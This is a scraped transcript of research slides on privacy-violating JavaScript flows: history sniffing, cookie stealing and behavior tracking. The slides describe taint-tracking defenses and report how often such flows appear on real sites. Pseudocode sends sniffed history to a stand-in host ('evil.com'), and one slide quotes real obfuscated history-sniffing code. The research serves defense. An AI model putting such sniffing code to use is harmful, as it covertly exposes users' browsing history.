document.location ✗ location hijacking phishing
TRANSCRIPT
![Page 1: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/1.jpg)
An Empirical Study ofPrivacy-Violating Information Flows
In JavaScript Web Applications
Dongseok Jang Ranjit Jhala Sorin Lerner Hovav Shacham
UC San Diego
![Page 2: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/2.jpg)
![Page 3: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/3.jpg)
document.location
✗ Location HijackingPhishing
![Page 4: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/4.jpg)
![Page 5: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/5.jpg)
document.cookie
Identity Theft✗ Cookie Stealing
![Page 6: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/6.jpg)
![Page 7: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/7.jpg)
✗ History Sniffing
JavaScriptVisited
Not-Visited
![Page 8: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/8.jpg)
![Page 9: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/9.jpg)
See absolutely everything visitors do on your webpage. …
![Page 10: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/10.jpg)
Behavior Tracking✗
![Page 11: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/11.jpg)
Plenty of Mischief Possible!
![Page 12: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/12.jpg)
How Prevalent Are Malicious Flows?
How to Detect Malicious Flows?
![Page 13: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/13.jpg)
MotivationFlow Policies
Dynamic Flow TrackingFlows in the Wild
Conclusions
![Page 14: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/14.jpg)
Flow Policies
Specify different types of flows
![Page 15: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/15.jpg)
Policies:History Sniffing
1. Create (invisible) link to a.com color depends on history
2. Inspect link’s color style property color says if link was visited
3. Send sniffed info over network
![Page 16: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/16.jpg)
Policies:History Sniffing link = createLink(“facebook.com”); style = doc.getStyle(link);
visited = style.color==“purple”;
send(“evil.com”,“facebook=” + visited);
![Page 17: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/17.jpg)
Policies:History Sniffing
Inject Taints(At confidential sources)
link = createLink(“facebook.com”); style = doc.getStyle(link);
visited = style.color==“purple”;
send(“evil.com”,“facebook=” + visited);
doc.getStyle(link);
![Page 18: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/18.jpg)
Policies:History Sniffing
Propagate Taints(At assignments, etc.)
link = createLink(“facebook.com”); style = doc.getStyle(link);
visited = style.color==“purple”;
send(“evil.com”,“facebook=” + visited);
doc.getStyle(link);
send(“evil.com”,“facebook=” + visited);
style
visited style.color==“purple”style.color==“purple”;
![Page 19: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/19.jpg)
link = createLink(“facebook.com”); style = doc.getStyle(link);
visited = style.color==“purple”;
send(“evil.com”,“facebook=” + visited); “cr=” +
color
Policies:History Sniffing
Block Taints(At untrusted sinks)
send(“evil.com”,“facebook=” + visited);
![Page 20: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/20.jpg)
Flow Policies
Inject Block
![Page 21: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/21.jpg)
Flow Policies
at doc.getStyle($1) if isLink($1)inject “secret”
Taint style with “secret”
Inject Block
![Page 22: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/22.jpg)
Flow Policies
Inject Block
![Page 23: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/23.jpg)
Flow Policies
at send($1, $2)block “secret” on $2
Block tainted values to third-party
Inject Block
![Page 24: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/24.jpg)
Flow Policies
Inject Blockat Site if Cond inject Taint
at Site block Taint on Param
![Page 25: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/25.jpg)
Flow Policies
ExpressiveHistory Sniffing
Behavior TrackingCookie Stealing
Location Hijacking…
![Page 26: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/26.jpg)
MotivationFlow Policies
Dynamic Flow TrackingFlows in the Wild
Conclusions
![Page 27: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/27.jpg)
Dynamic Flow TrackingRewrite JS code to carry taints
Parse ExecuteSourcecode AST Rewrite AST
Dynamic Eval
[Chander et al POPL 07]
![Page 28: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/28.jpg)
Add .taint fields
Parse ExecuteSourcecode AST Rewrite AST
Dynamic Eval
Inject, Propagate, Block Taints
Rewritten Code
![Page 29: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/29.jpg)
Rewriting Issues
Parse ExecuteSourcecode AST Rewrite AST
Boxing / UnboxingIndirect Flows
Dynamic Eval
![Page 30: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/30.jpg)
Rewriting Issues
Parse ExecuteSourcecode AST Rewrite AST
Boxing / UnboxingIndirect Flows
Dynamic Eval
![Page 31: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/31.jpg)
Dynamic Flow TrackingRewrite JS code to carry taints
Parse ExecuteSourcecode AST Rewrite AST
Dynamic Eval
Implemented in Chrome/V8
![Page 32: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/32.jpg)
Dynamic Flow TrackingPerformance (Overhead)
![Page 33: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/33.jpg)
Performance: Policies
Cookie Confidentialitycookie doesn’t flow to 3rd party
codeLocation Integrity
location unaffected by 3rd party code
![Page 34: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/34.jpg)
Performance: Benchmark
10 sites with the largest JS code base in Alexa top 100
15 – 31 Kloc (avg. 21Kloc)
![Page 35: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/35.jpg)
Performance: Figures
Timing OverheadsPage load (avg: 2x) JS execution (avg: 3x)
![Page 36: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/36.jpg)
Performance: Upshot
High for online useAcceptable for offline survey
![Page 37: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/37.jpg)
MotivationFlow Policies
Dynamic Flow TrackingFlows in the Wild
Conclusions
![Page 38: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/38.jpg)
Flows “In the Wild”
History Sniffing
Behavior Tracking
![Page 39: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/39.jpg)
History Sniffing: Figures
Alexa Top 50,000 sites
63 sites reported as sending history over network
1 site in Alexa Top 100
46 sites were real cases
![Page 40: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/40.jpg)
var k = {0:"qpsoivc/dpn",1:"sfeuvcf/dpn", 2:"bevmugsjfoegfs/dpn“...};var g = [];for (var m in k) { var d = k[m]; var a = ""; for (f=0; f<d.length; f++) a+=String.fromCharCode(d.charCodeAt(f) - 1) var h = false; for (var j in { "http://":"", "http://www.":""}) { var l = document.createElement("a"); l.href = j + a; document.getElementById("ol").appendChild(l); var e = document.getComputedStyle(l).getPropertyValue("color") if (e == "rgb(12, 34, 56)" || e == "rgb(12,34,56)") { h = true } } if (h) { g.push(m) }}
Encrypted URLs
Decrypt URLCreate Link
Inspect Color
History Sniffing: Example
1 site in Alexa Top 100
![Page 41: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/41.jpg)
History Sniffing: Real CasesRank Site Desc Src Inspected URLs61 youporn adult youporn pornhub,tube8,+ 21867 charter.net news interclick cars,edmunds,+462333 feedjit traffic feedjit twitter,facebook,+62415 gamestorrents game meaningtool amazon,ebay,+2202811 newsmax news interclick cars,edmunds,+463508 namepros forum feedjit twitter,facebook,+63603 fulltono music meaningtool amazon,ebay,+2204266 youporngay adult youporngay pornhub,tube8,+ 214581 osdir tech interclick cars,edmunds,+465233 gamesfreak game interclick cars,edmunds,+46
+ 36 more cases…
![Page 42: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/42.jpg)
History Sniffing: Real CasesRank Site Desc Src Inspected URLs61 youporn adult youporn pornhub,tube8,+ 21867 charter.net news interclick cars,edmunds,+462333 feedjit traffic feedjit twitter,facebook,+62415 gamestorrents game meaningtool amazon,ebay,+2202811 newsmax news interclick cars,edmunds,+463508 namepros forum feedjit twitter,facebook,+63603 fulltono music meaningtool amazon,ebay,+2204266 youporngay adult youporngay pornhub,tube8,+ 214581 osdir tech interclick cars,edmunds,+465233 gamesfreak game interclick cars,edmunds,+46
+ 36 more cases…
![Page 43: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/43.jpg)
History Sniffing: Real CasesRank Site Desc Src Inspected URLs61 youporn adult youporn pornhub,tube8,+ 21867 charter.net news interclick cars,edmunds,+462333 feedjit traffic feedjit twitter,facebook,+62415 gamestorrents game meaningtool amazon,ebay,+2202811 newsmax news interclick cars,edmunds,+463508 namepros forum feedjit twitter,facebook,+63603 fulltono music meaningtool amazon,ebay,+2204266 youporngay adult youporngay pornhub,tube8,+ 214581 osdir tech interclick cars,edmunds,+465233 gamesfreak game interclick cars,edmunds,+46
+ 36 more cases…
![Page 44: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/44.jpg)
History Sniffing: Real CasesRank Site Desc Src Inspected URLs61 youporn adult youporn pornhub,tube8,+ 21867 charter.net news interclick cars,edmunds,+462333 feedjit traffic feedjit twitter,facebook,+62415 gamestorrents game meaningtool amazon,ebay,+2202811 newsmax news interclick cars,edmunds,+463508 namepros forum feedjit twitter,facebook,+63603 fulltono music meaningtool amazon,ebay,+2204266 youporngay adult youporngay pornhub,tube8,+ 214581 osdir tech interclick cars,edmunds,+465233 gamesfreak game interclick cars,edmunds,+46
+ 36 more cases…
doubleclick.net
charter.net doubleclick.net interclick
![Page 45: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/45.jpg)
History Sniffing: Real CasesRank Site Desc Src Inspected URLs61 youporn adult youporn pornhub,tube8,+ 21867 charter.net news interclick cars,edmunds,+462333 feedjit traffic feedjit twitter,facebook,+62415 gamestorrents game meaningtool amazon,ebay,+2202811 newsmax news interclick cars,edmunds,+463508 namepros forum feedjit twitter,facebook,+63603 fulltono music meaningtool amazon,ebay,+2204266 youporngay adult youporngay pornhub,tube8,+ 214581 osdir tech interclick cars,edmunds,+465233 gamesfreak game interclick cars,edmunds,+46
+ 36 more cases…
gamestorrents harrenmedianetwork meaningtool
![Page 46: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/46.jpg)
History Sniffing: Upshot
# of sniffed URLs: 8 to 22246 of real cases
39 had third-party sniffing code7 had home-grown code
Obfuscated sniffing codeCode was generated at runtime
![Page 47: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/47.jpg)
Malicious Flows “In the Wild”
History Hijacking
Behavior Tracking
![Page 48: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/48.jpg)
Behavior Tracking
Log user behavior by JS event handlers
Send log back to website
![Page 49: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/49.jpg)
Behavior Tracking: Policywhile(1){ e = getEvent(); if (e.isMouseOver()) onMouseOver(e); if (e.isClick()) onClick(e); ...}onMouseOver = function(event) isMouseOver = true;}
true
![Page 50: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/50.jpg)
Behavior Tracking: Policy
at $1.isMouseOver() inject “secret”at $1.isClick() inject “secret”…
while(1){ e = getEvent(); if (e.isMouseOver()) onMouseOver(e); if (e.isClick()) onClick(e); ...}
e.isMouseOver()
![Page 51: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/51.jpg)
Behavior Tracking: Figures
Alexa Top 1300 sites328 sites sent behavior115 sites sent behavior covertly10 sampled for manual inspection7 manually reconstructed flow
Automatically trigger JS event handlersMany user-visible (image swapping)
Covert Filter: response < 100 bytes
![Page 52: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/52.jpg)
Behavior Tracking: Real CasesRank Site Desc Events3 youtube media click11 yahoo.co.jp portal click15 sina.com.cn portal click19 microsoft software click,mouseover34 mail.ru email click53 soso search click65 about search click
![Page 53: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/53.jpg)
Behavior Tracking: Real CasesRank Site Desc Events3 youtube media click11 yahoo.co.jp portal click15 sina.com.cn portal click19 microsoft software click,mouseover34 mail.ru email click53 soso search click65 about search click
![Page 54: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/54.jpg)
Behavior Tracking: Real CasesRank Site Desc Events3 youtube media click11 yahoo.co.jp portal click15 sina.com.cn portal click19 microsoft software click,mouseover34 mail.ru email click53 soso search click65 about search click
webtrends.com
![Page 55: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/55.jpg)
MotivationFlow Policies
Dynamic Flow TrackingFlows in the Wild
Conclusions
![Page 56: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/56.jpg)
ConclusionsFlows Occur In The WildReal cases for further study
Dynamic Approach is RequiredObfuscated & dynamically generated
![Page 57: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/57.jpg)
Future workLarger Scale Study on Flows
Deeper crawl & other types of flow
Bullet-proof Protection ToolPolicy enforcement without
much slowdown & many false-alarms
![Page 58: document.location ✗ Location Hijacking Phishing](https://reader036.vdocument.in/reader036/viewer/2022062409/56649ea45503460f94ba918a/html5/thumbnails/58.jpg)
Thank you!